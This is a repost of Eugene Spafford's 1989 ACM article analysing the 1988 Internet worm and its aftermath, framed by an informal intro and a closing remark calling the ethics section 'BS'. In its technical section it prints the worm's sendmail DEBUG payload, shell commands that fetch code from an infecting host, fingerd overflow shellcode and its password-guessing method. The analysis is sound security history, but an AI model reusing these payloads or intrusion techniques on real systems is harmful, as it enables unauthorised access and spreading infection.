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 dudes, grabed this of a CD-ROM disk of articles, explains how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me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:   Communications of the ACM  June 1989  v32 n6 p678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Crisis and aftermath. (the Internet w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Spafford, Eugene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The Internet computer network was attacked on Nov 2, 1988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rm.  Although the program affected only Sun Microsystems Sun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and VAX computers running a variant of version 4 of the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the program spread over a huge section of the network.  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y a number of methods for containing and eradicating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iscovered and published.  It was discovered that the worm explo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s in the Unix operating system's security routines and us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's own utilities to propagate itself. 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of the worm and its methods of entry into Unix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.  The aftermath of the infection and the motives of Robert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, its author, are also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is and Aftermath On the evening of November 2, 1988 the Interne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ttack from within.  Sometime after 5 p.m., a program was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hosts connected to the Internet.  That program collected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user information, then used that information to break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using flaws present in those systems' software.  After break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replicate itself and the replica would attempt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gram would only infect Sun Micro-systems' Sun 3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computers running variants of 4 BSD UNIX, the program spread quick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confusion and consternation of system administrators and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scovered the invasion of their systems.  The scope of the break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s a great surprise to almost everyone, despite the fact that UNI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en known to have some security weaknesses (cf. [4, 12, 1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mysterious to users at sites where it appeared. Unus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eft in the /usr/tmp directories of some machines, and stran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log files of some of the utilities, such as the sendm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gent.  The most noticeable effect, however, was that system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loaded with running processes as they became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 As time went on, some of these machines bacame so load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able to continue any processing; some machines failed comple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wap space or process tables were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arly Thursday morning, November 3, personnel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t Berkeley and Massachusetts Institute of Technology (MIT)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d" copies of the program and began to analyze it. People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also began to study the program and were developing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ng it.  A common fear was that the program was somehow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tem resources in a way that could not be readily detected--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e was being sought, system files were being altered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 By 5 a.m. Thursday morning, less than 12 hours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st discovered on the network, the Computer Systems Research Gro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had developed an interim set of steps to halt its spre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preliminary patch to the sendmail mail agent.  Th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ublished in mailing lists and on the Usenet, although their spre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ered by systems disconnecting from the Internet to attem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ant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bout 9 p.m. Thursday, another simple, effective method of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 program, without altering system utilities, was discovered at Pu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idely published.  Software patches were posted by the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t the same time to mend all the flaws that enabled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 systems.  All that remained was to analyze the code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discover who had unleashed the worm--and why.  In the wee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other well-publicized computer break-ins occurred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s began about how to deal with the individuals staging these inv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lso much discussion on the future roles of networks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mplexity of the topics, conclusions drawn from thes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time in coming.  The on-going debate should b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fessionasl everywher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ORM OP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 took advantage of some flaws in standard software installe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.  It also took advantage of a mechanism used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of resources in local area networks.  Specific patch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s have been widely circulated in days since the worm program att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program is a utility that allows users to ob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.  It is usually used to identify the full name or login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whether or not a user is currently logged in, and possib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erson such as telephone numbers where he or s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The fingerd program is intended to run as a daemon,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o service remote requests using the finger protocol.  Thi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cepts connections from remote programs, reads a sing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and then sends back output matching the receive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exploited to break fingerd involved overrunning the buffer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input.  The standard C language I/O library has a few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put without checking for bounds on the buffer involv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gets call takes input to a buffer without doing any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; this was the call exploited by the worm.  As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e input overran the buffer allocated for it and rewrot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hus altering the behavi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s routine is not the only routine with this flaw.  There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routines in the C library that may also overrun buff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input or formatting output unless the user explicitly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 the number of characters to be converted.  Although experienc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re aware of the problems with these routines, the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  Worse, their format is in some sense codified not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clusion in UNIX and the C language, but more form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 ANSI language standard for C.  The hazard with these cal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network server or privileged program using them may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 by careful precalculation of the (in)appropri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at least two long-standing flaws based on thi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ve recently been discovered in standard BSD UNIX commands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s by various individuals have revealed other potential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atches have been circulated since November to deal with these f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library routines will continue to be used, and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this incident fades, new flaws may be introduced with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mail program is a mailer designed to route mail in a heter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work.  The program operates in a number of modes, bu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 by the worm involves the mailer operating as a daemon (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 this mode, the program is "listening" on a TCP port (#25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eliver mail using the standard Internet protocol, SMTP (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ransfer Protocol).  When such an attempt is detected, the daemon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alog with the remote mailer to determine sender, recipient,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messa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exploited in sendmail had to do with functionality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ption in the code.  The worm would issue the DEBU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and then specify a set of commands instead of a user addr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, this is not allowed, but it is present in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allow testers to verify that mail is arriving at a particula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to invoke the address resolution routines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esters can run programs to display the state of th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nding mail or establishing a separate login connection.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often used because of the complexity of configuring send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ditions, and it is often left turned on by many vendors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mail program is of immense importance on most Berkeley-deriv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UNIX systems because it handles the complex tasks of mail ro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.  Yet, despite its importance and widespread use, m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know little about how it works.  Stories are oft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system administrators will attempt to write new device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y the kernel of the operating system, ye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ly attempt to modify sendmail or it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ttle wonder, then, that bugs are present in sendmail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behavior.  Other flaws have been found and reported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has been focused on the program, but it is not known for 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ugs have been discovered and all the patches cir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attack of the worm involved attempts to discover user passwo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determine success because the encrypted password of each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ublicly readable file.  In UNIX systems, the user provides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ign-on to verify identity.  The password is encrypted using a per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ata Encryption Standard (DES) algorithm, and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against a previously encrypted version present in a word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ile.  If a match occurs, access is allowed.  No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re contained in the file, and the algorithm is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vertible without knowledge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of the passwords in UNIX allows nonprivileged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information stored in the accounts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fication schemes using user passwords.  However, it also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to encrypt lists of possible passwords and then compare them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asswords without calling any system function.  In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the passwords is provided by the prohibitive effort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with all combinations of letters.  Unfortunately, a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aster, the cost of such attempts decreases.  Dividing the task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cessors further reduces the time needed to decryp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ttacks are also made easier when users choose obvious or comm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passwords.  An attacker need only try lists of common word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 used such an attack to break passwords.  It used lists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tandard online dictionary, as potential passwo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them using a fast version of the password algorith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he result against the contents of the system file.  Th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 the accessibility of the file coupled with the tendency of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common words as their passwords.  Some sites reported that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ir passwords were quickly broken by this simp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reduce the risk of such attacks, and an approach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ken in some variants of UNIX, is to have a shadow passwor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passwords are saved in a file (shadow) that is readable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ors, and a privileged call performs password encry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isons with an appropriate timed delay (0.5 to 1 seco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.  This would prevent any attempt to "fish"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 threshold could be included to check for repea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from the same process, resulting in some form of alarm being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password files should be used in combination with encryp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place of such techniques, however, or one problem is simply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ifferent one (securing the shadow file); the combinatio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s stronger than either on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strengthen the password mechanism would b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sets user passwords.  The utility currently makes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ensure that new passwords are nontrivial to gues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trengthened in such a way that it would reject any choic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online dictionary or based on the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ated flaw exploited by the worm involved the use of trusted logi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useful features of BSD UNIX-based networking code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asks on remote machines. To avoid having to repeated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to access remote accounts, it is possible for a user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ost/login name pairs that are assumed to be "trusted,"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emote access from that host/login pair is never ask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often been responsible for users gaining unauthoriz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hines (cf. [11]), but it continues to be used because of it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 exploited the mechanism by locating machines that might "trus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chine/login being used by the worm.  This was done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listed remote machine/logins used by the host.  Often,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unts are reconfigured for reciprocal trust.  Once the worm fou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candidates, it would attempt to instantiate itself on thos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remote execution facility--copying itself to the remot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ere an authorized user performing a standard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eat such future attempts requires that the current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be removed and possibly replaced with something els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hat shows promise in this area is the Kerberos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his scheme uses dynamic session keys that need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.  Thus, an invader could not make use of static author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 consisted of two parts: a main program, and a bootstrap o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main program, once established on a machine, would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ther machines in the network to which the curr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nect.  It would do this by reading public configuration file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ystem utility programs that present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network connections.  It would then attempt to use the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to establish its bootstrap on each of those remot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 was brought over to each machine it infected via the a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gram commonly referred to as the vector program or as the gra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program.  Some people have referred to it as the l1.c progra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file name suffix used on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ctor program was 99 lines of C code that would be compiled an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machine.  The source for this program would b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machine using one of the methods discussed in the next se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compiled and invokedon the victim machine with th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: the network address of the infecting machin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port to connect to on that machine to get copies of the main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a magic number that effectively acted as a one-time-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If the "server" worm on the remote host and port did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gic number back before starting the transfer, it w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from the vector program.  This may have been don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from attempting to "capture" the binary files by spoofing a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also went to some effort to hide itself, both by zeroing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vector (command line image), and by immediately fork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f a failure occurred in transferring a file, the code dele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had already transferred, then it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stablished on the target machine, the bootstrap would connec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ce of the worm that originated it and transfer a set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precompiled code) to the local machine.  Each binary fil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he main worm program, compiled for a particula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and operating system version.  The bootstrap would als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itself for use in infecting other systems.  One curious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trap has provoked many questions, as yet unanswered: the progra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allocated to enable transfer of up to 20 files; i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three.  this has led to speculation whether a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worm was planned for a later date, and if that vers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rried with it other command files, password data, or possibl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 trojan hor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inary files were transferred, the bootstrap program would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se files with the local versions of the standard librar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, these programs were invoked.  If one of them ran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 into its memory copies of the bootstrap and binary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he copies on disk. It would then attempt to break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If none of the linked versions ran, then the mechanism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(a command file or the parent worm) would delete all the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attempted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more detailed overview of how the wo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ed.  The description in this section assumes that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familiar with standard UNIX commands and with BSD UNIX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 A more detailed analysis of operation and compon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[16], with additional details in [3] and [1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 starts from the point at which a hos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  At this point, a worm running on another machine h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establishing a shell on the new host and has connec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cting machine via a TCP connection, or it has connected to the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is transmitting to the sendmail program.  The infection procee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socket was established on the infecting machine for the vec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(e.g., socket number 32341).  A challenge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from a random number (e.g., 8712440).  A file name bas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using a random number (e.g., 144819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vector program was installed and executed using one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cross a TCP connection to a shell, the worm would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the three lines beginning with "cc" and the two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echo" were sent as a single line): PATH=/bin:/usr/bin:/usr/ucb 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tmp echo gorch49; sed '/int zz/q' &gt; x14481910.c; echo gorch50 [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program] int zz; cc -o z14481910 x14481910.c;./x14481910 128.32.13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1 8712440; rm -f x14481910 x14481910.c; ech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ould wait for the string "DONE" to signal that the vec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sing the SMTP connection, it would transmit (the three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cc" and the two lines beginning with "rcpt" were sent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: debug mail from: &lt;/dev/null&gt; rcpt to: &lt;"!sed -e '1,/*$/'d! /bin/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0"&gt; data cd /usr/tmp cat &gt; x14481901.c &lt;&lt; 'EOF' [text of vector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cc -o x14481910 x14481910.c; x14481910 128.32.134.16 32341 8712440; rm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81910 x14481910.c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cting worm would then wait for up to two minutes on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r the vector to conta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vector program then connected to the "server," sent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transferred three files: a Sun 3 binary version of the wor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version, and the source code for the vector program.  Afte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pied, the running vector program became (via the execl call)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input and output still connected to the server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erver worm sent the following command stream to the connected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/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then P=x14481910 else P=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for each binary file it had transferred (just two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de is written to allow more), it would send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 sequence: cc -o $P x14481910, sun3.o ./$P -p $$ x14481910,sun3.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81910,vax.o x14481910,11.c rm -f $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m would succeed only if the linked version of the worm fail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If the server determined that the host was now infe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connection.  Otherwise, it would try the other binary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inary files had been tried, it would send over rm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to clear away all evidence of the attempt at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new worm on the infected host proceeded to "hide" itself by obs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 vector, unlinking the binary version of itself, and kill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(the $$ argument in the invocation). It then read into memory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 binary files, encrypted each file after reading it, and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ext, the worm gathered information about network interfaces and h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local machine was connected.  It built lists of thes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formation about canonical and alternate names and addres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some of this information by making direct ioctl calls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etstat program with various arguments.  It also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ystem files looking for host names to add to i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t randomized the lists it constructed, then attempted to infec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osts.  For directly connected networks, it created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umbers and attempted to infect those hosts if they existed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host (gateway or local network), the worm firs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connection on the telnet or rexec ports to determine reach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attempted one of the inf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infection attempts proceeded by one of three routes: rsh, finge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attack via rsh was done by attempting to spawn a remote sh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(in order of trial) /usr/ucb/rsh, /usr/bin/rsh, and /bin/r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cessful, the host was infected as in steps 1 and 2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attack via the finger daemon was somewhat more subtle. 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stablished to the remote finger server daemon and then a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string of 536 bytes was passed to the daemon, overflow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uffer and overwriting parts of the stack.  For standard 4BS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VAX computers, the overflow resulted in the return stack fr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outine being changed so that the return address poin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n the stack.  The instructions that were written into the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cation were: pushl $68732f '/sh\0' pushl $6e69622f '/bin' movl sp, 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l $0 pushl $0 pushl r10 pushl $3 movl sp,ap chmk $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code executed when the main routine attempted to return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ve("/bin/sh", 0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s, this resulted in the worm connected to a remote shell via th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The worm then proceeded to infect the host as in step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(a).  On Suns, this simply resulted in a core dump since the code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orrupt a Sun version of fingerd in a similar fashion.  Cu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achine-specific code to corrupt Suns could have been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hours and included, but was not [1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worm then tried to infect the remote host by establish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MTP port and mailing an infection, as in step 2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steps were attempted.  As soon as one method succeeded,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internal list was marked as infected and the other metho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ext, it entered a state machine consisting of five states. Each sta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as run for a short while, then the program looped back to ste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empting to break into other hosts via sendmail, finger, or rs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of the five states were attempts to break into user ac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machine.  The fifth state was the final state, and occur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tempts had been made to break all passwords.  In the fifth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looped forever trying to infect hosts in its internal tables and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 yet infected.  The first four state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worm read through the /etc/hosts.equiv files and /.rhost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names of equivalent hosts.  These were marked in the in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sts.  Next, the worm read the /etc/passwd (the account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file into an internal data structure.  As it was doing thi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he .forward file (used to forward mail to a differ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) in each user home directory and included those host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table of hosts to try.  Oddly, it did not similarly chec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hos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worm attempted to break each user password using simple cho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first checked the obvious case of no password. Then, it used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user information field to try simple passwords. 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d an entry in the password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abcdefghijklm:100:5:User, Name:/usr/account:/bin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represent, respectively, the account name, the encrypted pass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number, the user's default group ID number, per-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 pathname of the user's home account, and the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efault command interpreter or shell.)  The words tried a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would be account, accountaccount, User, Name, user,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cca.  These are, respectively, the account name, the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with itself, the first and last names of the use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 leading capital letters turned to lowercase, and the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  Experience described in [4] indicates that on systems whe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ive about password security, these choices may work for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0 describes what was done if a password "hit" wa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third stage in the process involved trying to break the pass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by trying each word present in an internal dictionary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ctionary of 432 words was tried against each account i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with password "hits" being handled as described in step 10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ctionary is given in [16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fourth stage was entered if all other attempts failed.  For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X online dictionary, the worm would see if it was the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count.  In addition, if the word in the dictionary bega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, the letter was converted to lowercase and that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ied against all th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Once a password was broken for any account, the worm w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to remote machines where that user had accounts. The worm woul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forward and .rhosts files of the user at this point, and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remote hosts that had accounts used by the target user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wo att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worm would first attempt to create a remote shell using the r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The attempt would be made using the account nam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ward or .rhosts file and the user's local password.  This took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t that users often have the same password on their ac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worm would do a rexec to the current host (using the local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) and would try a rsh command to the remote ho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taken from the file.  This attack would succeed in those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machine had a hosts.equiv file or the user had a .rhost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remote execution with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hell was created either way, the attack would continu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1 and 2(a).  No other use was made of the us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execution of the main loop, the worm would check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 running on the same machine.  To do this, the worm w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nother worm on a local, predetermined TCP socket. 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ucceeded, one worm would (randomly) set its pleasequi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, causing that worm to exit after it had reached part way in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(9c) of password cracking.  This delay is part of the reas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d multiple worms running: even though a worm would check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worms, it would defer its self-destruction until significant effor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to break local passwords.  Furthermore, race conditions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possible for worms on heavily loaded machines to fail to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ausing some of them to continue indefinitely despit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ut of every seven worms would become immortal rather than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cal worms.  Based on a generated random number they would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lag that would prevent them from ever looking for another w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st.  This may have been done to defeat any attempt to put a fak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 the TCP port to kill existing worms.  Whatever the reas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ly the primary cause of machines being overloaded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 attempted to send an UDP packet to the host ernie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once every 15 infections, based on a random numbe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do this was incorrect, however, and no information was ever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was an intended ruse or whether there was actually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yte to be sent is not currently known.  However, the code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uninitialized byte is the intended message.  It is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eventually intended to run some monitoring program on erni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into an account, perhaps).  Such a program could obtain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umber from the single-byte message, whether it was sent as a TCP or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However, no evidence for such a program has been found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connection was simply a feint to cast suspic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at Berk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 would also fork itself on a regular basis and kill its par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two purposes.  First, the worm appeared to keep changing i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nd no single process accumulated excessive amounts of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processes that have been running for a long time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downgraded by the scheduler.  By forking, the new proc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normal scheduling priority.  This mechanism did not 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either, as we locally observed some instances of the w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600 seconds of accumulated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m ran for more than 12 hours, it would flush its host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lagged as being immune or already infected. The way host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list implies that a single worm might reinfect the sa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eks and months following the release of the Internet wor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number of topics hotly debated in mailing lists, media co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al conversations.  I view a few of these a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, and will present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Intent, and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first questions to be asked--even before the wo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--were simply the questions who and why.  Who had written the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had he/she/they loosed it upon the Internet?  The question of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quite shortly thereafter when the New York Times identifie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Morris.  Although he has not publicly admitted authorship, and no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has yet pronounced guilt, there seems to be a large body of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uch an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fficials have told me that they have obtained stat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dividuals to whom Morris spoke about the worm and it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have records from Cornell University computers showing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worm code being tested on campus machines.  The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worm code, found in Morris'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identity of the author seems fairly well-established.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 remains a mystery.  Speculation has ranged from an experiment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 to an unconscious act of revenge against his father, who is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curity Center's chief scientist.  All of this is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, however, since no statement has been forthcoming from Mo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have to work with is the decompiled code for the program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its effects.  It is impossible to intuit the real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or from various individuals' experiences with the author. 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 a definitive statement by the author to answer the question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potential legal consequences, both criminal and civi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from Morris may be some time in coming, if it ev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have impressed many people (this author included) who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iled code.  First, the worm program contained no cod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ny system on which it ran.  Considering the ability an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d by the code, it would have been a simple matter for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such commands if that was his intent.  Unless the wo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prematurely, it appears that the author's intent did no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r damage of any data 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eature of note was that the code had no mechanism to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f the worm.  Once started, the worm would propagate while also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avoid identification and capture.  Due to this and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tring necessary to start it, individuals who have examined th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uthor included) believe it unlikely that the worm wa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or was not intended to propagate wid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our lack of definitive information, it is puzzling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efend Morris by claiming that his intent was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Internet security, or that he was trying a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 Even the president of the ACM, Bryan Kocher, state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ank in [7].  It is curious that this many people, both journa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fessionals alike, would assume to know the intent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observed behavior of the program.  As Rick Adams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ismic Studies observed in a posting to the Usenet, we may someda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m was actually written to impress Jodie Foster--we simp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real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with this tendency to assume motive, we have observed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n the punishment, if any, to mete out to the author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-expressed opinion, especially by those individuals who believe th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as an accident or an unfortunate experiment, is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unished.  Some have gone so far as to say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warded and the vendors and operators of the affecte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ones punished, this on the theory that they were slopp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curity and somehow invited the ab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xtreme school of thought holds that the author should b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d, including a term in a federal penitentiary. (One somewhat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point of view was espoused by syndicated columnist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as been observed in both [2] and [6], it would not serve us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act to this particular incident.   However, neither should we di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omething of no consequence.  The fact that there was no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an accident, and it is possible that the author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clog the Internet as it did.  Furthermore, we should be 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ting dangerous precedent for this kind of behavior.  Excusing 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andalism simply because the authors claim there was no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amage will do little to discourage repeat offenses, and may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new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im that the victims of the worm were somehow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of their machines is also curious.  The individuals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seem to be stating that there is some moral or legal oblig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to track and install every conceivable security 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vailable.  This completely ignores the fact that many sit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ey systems without source code or knowledge of how to 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hose sites may also be running specialized software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budgets that prevent them from installing new softwa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ercial and government sites operate their systems in this wa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lame these individuals for the success of the worm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ming an arson victim for the fire because she didn't build her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roof metal.  (More on this theme can be found in [17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of appropriate punishment will likely be decided by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.  A grand jury in Syracuse, N.Y., has been hearing testimon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A federal indictment under the United States Code, Title 18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(the Computer Crime statute), parts (a)(3) or (a)(5) might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a)(5), in particular, is of interest.  That part of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 felony if an individual "intentionally accesses a feder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out authorization, and by means of one or more instanc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lters, damages, or destroys information . . . , or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 of any such computer or information and thereby causes l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thers of a value aggregating $1,000 or more during any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" (emphasis added).  State and civil suits might also be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 H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conclusion reached at the NCSC post-mortem workshop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e worm was stopped so quickly was due almost solely to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-boy" network, and not due to any formal mechanism in plac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mmendation from that workshop was that a formal crisis cen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to deal with future incidents and to provide a form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r individuals wishing to report problems.  No such cen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29, 1988, someone exploiting a security flaw present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FTP file transfer program broke into a machine on the MI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uder was traced to a machine on the Arpanet, and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further access, the MILNET/Arpanet links were severed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48 hours there was considerable confusion and rum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on, fueled in part by the Defense Communication Agency'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e disconnection as a "test" rather than as a secur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, coming as close as it did to the worm incident, prompted DARP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CERT--the Computer Emergency Response Team--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Institute at Carnegie Mellon University.  The purpose of C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 as a central switchboard and coordinator for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ies on Arpanet and MILnet computers.  The Center has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 from federal agencies and funded laboratories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dvisor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here is that CERT is not chartered to deal with an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  Thus, problems detected in the CSnet, Bitnet, NSFne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ommunities may not be referable to the CERT.  I was tol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 of CERT personnel that these other networks will develop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-like groups.  This, of course, may make it difficult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ction and communication during the next threat.  It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rivalry in the development and dissemination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f interest is the composition of the personnel CERT is enlis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.  Apparently there has been little or no solicitation of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industrial and academic computing communities.  This i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olution to the worm originated.  The effective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against the next Internet-wide crisis will be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sequences of the Internet worm incident are not yet known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ver be.  Most likely there will be changes in security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a short period of time.  There may also be new law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from the agencies governing access to the Internet.  Vend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ay they test and market their products--and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hanges will be advantageous to the end-user (e.g.,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/host equivalence feature for remote execution).  Users'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systems may change as well.  It is also possibl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 will occur anywhere.  The final benefit or ha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will only become clear with the passag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the nature of both the Internet and UNIX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at the worm as well as spread it.  The immediacy of commun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py source and binary files from machine to mach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availability of both source and expertise allowe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country to work together to solve the infection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disconnection of parts of the network.  Although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of some people might be to restrict communication or prom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of incompatible software options to prevent a recurrence of a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an inappropriate reaction.  Increasing the obstacl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or decreasing the number of people with access to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not prevent a determined hacker--it will only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expertise and resources available to fight such an attack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attitude would be contrary to the whole purpose of having an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-oriented network. The worm was caused by a breakdown of ethi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lapses in security--a purely technological attempt at preven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dress the full problem, and may just cause new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learn from this about securing our systems will help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such incident we ever need to analyze.  This atta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int out that we need a better mechanism in place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ecurity flaws and attacks.  The response to this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rgely ad hoc, and resulted in both duplication of effort and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seminate valuable information to sites that needed it.  Many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discovered the problem from reading newspapers or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.  The major sources of information for many of the site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been Usenet news groups and a mailing list I put togeth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 was first discovered.  Although useful, these methods did no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, widespread dissemination of useful information--especially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d on the Internet to work!  Over three weeks after this incid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ere still not reconnected to the Internet.  The worm has shown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l affected by events in our shared environment,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better information methods outside the network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  The formation of the CERT may be a step in the right dir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general solution is still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is whole episode should prompt us to think about the et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concerning access to computers.  The technology we use has develop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t is not always easy to determine where the proper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action should be.  Some senior computer professionals star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s years ago by breaking into computer systems at their col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of employment to demonstrate their expertise and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workings of the systems.  However, times have changed and mast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and computer engineering now involves a great dea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hown by using intimate knowledge of the flaws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Whether such actions were appropriate fifteen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n some senses, unimportant.  I believe it is critical t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ehavior is clearly inappropriate now.  Entire business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, wisely or not, on the undisturbed functioning of computer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careers, property, and lives may be placed in jeopardy by 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abotage and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ociety, we cannot afford the consequences of such actio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, computer scientists and computer engineers can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 the romanticization of computer vandals and computer crimi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take the lead by setting proper examples.  Let us hop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cidents to underscore this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retty cool except for those last two paragraphs of BS huh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